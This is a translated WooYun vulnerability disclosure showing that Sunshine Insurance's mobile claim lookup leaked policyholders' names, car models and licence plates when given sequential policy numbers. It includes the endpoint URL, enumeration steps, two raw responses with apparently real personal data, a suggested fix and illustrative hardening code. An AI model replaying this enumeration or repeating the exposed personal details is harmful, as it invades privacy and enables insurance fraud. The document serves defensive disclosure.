Vulnerability Summary
Report ID: wooyun-2015-0126380
Title: 阳光保险 (Sunshine Insurance) allows bulk retrieval of insured persons' vehicle model, name, license plate number, etc. (exposes them to auto insurance fraud)
Vendor: 阳光保险
Author: prolog
Submitted: 2015-07-13 10:40
Fixed: 2015-08-28 16:36
Published: 2015-08-28 16:36
Vulnerability type: sensitive information disclosure
Severity: Medium
Self-assessed Rank: 10
Status: handed over to a third-party partner organisation (CNCERT, National Internet Emergency Center) for handling
Source: http://www.wooyun.org; for questions or help contact [email protected]
Tags: none
Vulnerability Details
Disclosure status:
2015-07-13: Details sent to the vendor, awaiting the vendor's handling
2015-07-14: Vendor confirmed; details disclosed to the vendor only
2015-07-24: Details disclosed to core white hats and experts in the relevant field
2015-08-03: Details disclosed to regular white hats
2015-08-13: Details disclosed to intern white hats
2015-08-28: Details disclosed to the public
Brief description:
阳光保险 allows bulk retrieval of insured persons' vehicle models and names.
Detailed description:
1. Obtain valid policy numbers via a Baidu search.
Official 阳光 auto insurance policy numbers: 1021205092015004597 10212050720150121
2. Open the auto insurance claim report and enter the policy number:
http://m.sinosig.com/mobile/claimreport/carinsurance/car_claim_report!index.action?WT.ac_id=GW_mobile_index_chexianbaoan&needWxShare=true
The response returns the vehicle model and the owner's name:
{"IDCardNumber":null,"ajaxCode":null,"ajaxStatus":"success","alipayAccount":null,"apiusername":null,"applicantIdNo":null,"applicantIdType":null,"applicantName":"宋伟萍","brandName":"大众汽车SVW71611FS","caseKind":null,"caseKindName":null,"caseNo":null,"claimCustomerNo":null,"claimNo":null,"claimStatusList":null,"claimType":null,"damageArea":null,"damageCase":null,"damageCity":null,"damageDate":null,"damagePlace":null,"damageProv":null,"damageTown":null,"driver":null,"driverMobile":null,"gpsLat":null,"gpsLng":null,"isAlipay":null,"isGuess":null,"licenseNo":"鲁A988CP","licenseNoList":null,"lipeijindu":null,"lossType":null,"mobile":null,"notifyDate":null,"notifyMan":null,"nowDate":null,"ntfmIdentity":null,"payClaimList":null,"payClaimMapList":null,"policyNo":"1021205092015004597","policyNoList":null,"policyNos":"1021205092015004597","reportType":null,"resultMsg":null,"returnMessage":null,"riskCodes":"0509","sequenceNo":null,"source":null,"unPayClaimList":null,"wxId":null}
3. Policy numbers are sequential; the next one is 1021205092015004598:
{"IDCardNumber":null,"ajaxCode":null,"ajaxStatus":"success","alipayAccount":null,"apiusername":null,"applicantIdNo":null,"applicantIdType":null,"applicantName":"赵勇","brandName":"纳智捷DYM7182AAA","caseKind":null,"caseKindName":null,"caseNo":null,"claimCustomerNo":null,"claimNo":null,"claimStatusList":null,"claimType":null,"damageArea":null,"damageCase":null,"damageCity":null,"damageDate":null,"damagePlace":null,"damageProv":null,"damageTown":null,"driver":null,"driverMobile":null,"gpsLat":null,"gpsLng":null,"isAlipay":null,"isGuess":null,"licenseNo":"鲁A2D287","licenseNoList":null,"lipeijindu":null,"lossType":null,"mobile":null,"notifyDate":null,"notifyMan":null,"nowDate":null,"ntfmIdentity":null,"payClaimList":null,"payClaimMapList":null,"policyNo":"1021205092015004598","policyNoList":null,"policyNos":"1021205092015004598","reportType":null,"resultMsg":null,"returnMessage":null,"riskCodes":"0509","sequenceNo":null,"source":null,"unPayClaimList":null,"wxId":null}
4. Likewise, supplying a valid license plate number, 冀A526FE, also returned the insured's name.
Proof of vulnerability:
...
Suggested fix:
Apply multi-factor control to claim lookups, for example by requiring the insured's ID card number and name in addition to the policy number.
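As an added illustration of the fix above (example code, not from the report, the vendor or the site), a claim-lookup handler that requires the policy number together with the insured's ID number and name, answers identically for a wrong factor and a non-existent policy so sequential numbers can no longer be probed, masks the fields it does return, and locks a client after repeated failures. The records, ID numbers and plates are constructed sample data and the lockout threshold is a hypothetical value.

```python
import hmac
from collections import defaultdict

# Constructed sample records (fake names, ID numbers and plates); the policy
# numbers reuse the two sequential values quoted in the report.
POLICIES = {
    "1021205092015004597": {"applicantName": "Li Sample", "applicantIdNo": "110101199001011234",
                            "brandName": "Example Motor X1", "licenseNo": "TEST1234"},
    "1021205092015004598": {"applicantName": "Wang Sample", "applicantIdNo": "110101198505053456",
                            "brandName": "Example Motor X2", "licenseNo": "TEST5678"},
}

def vulnerable_lookup(policy_no):
    """Reported behaviour: the policy number alone unlocks the whole record."""
    rec = POLICIES.get(policy_no)
    return dict(rec) if rec else None

MAX_FAILURES = 5            # hypothetical per-client lockout threshold
_failures = defaultdict(int)

def _mask(value, keep=1):
    """Show only the first `keep` characters, e.g. TEST1234 -> T*******."""
    return value[:keep] + "*" * (len(value) - keep)

def _eq(a, b):
    # constant-time comparison; encode so non-ASCII names are accepted
    return hmac.compare_digest(a.encode("utf-8"), b.encode("utf-8"))

def hardened_lookup(policy_no, id_no, name, client="anon"):
    """Fix from the report: policy number, ID number and name must all match."""
    if _failures[client] >= MAX_FAILURES:
        return {"ajaxStatus": "locked"}
    rec = POLICIES.get(policy_no, {"applicantIdNo": "", "applicantName": ""})
    # evaluate every factor on every request so a missing policy and a wrong
    # factor look the same to the caller (no enumeration oracle)
    ok = _eq(rec["applicantIdNo"], id_no) & _eq(rec["applicantName"], name) & (policy_no in POLICIES)
    if not ok:
        _failures[client] += 1
        return {"ajaxStatus": "fail"}
    _failures[client] = 0
    return {"ajaxStatus": "success", "policyNo": policy_no,
            "applicantName": _mask(rec["applicantName"]),
            "licenseNo": _mask(rec["licenseNo"], keep=2),
            "brandName": rec["brandName"]}
```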
Copyright notice: please credit the source, prolog@乌云, when reprinting.
Vulnerability Response
Vendor response:
Severity: Medium
Vulnerability Rank: 10
Confirmed: 2015-07-14 16:35
Vendor reply:
CNVD confirmed the reported situation and has forwarded it via CNCERT to the competent department for informatisation in the insurance industry, which will coordinate the handling with the website's operating unit.
Latest status:
None yet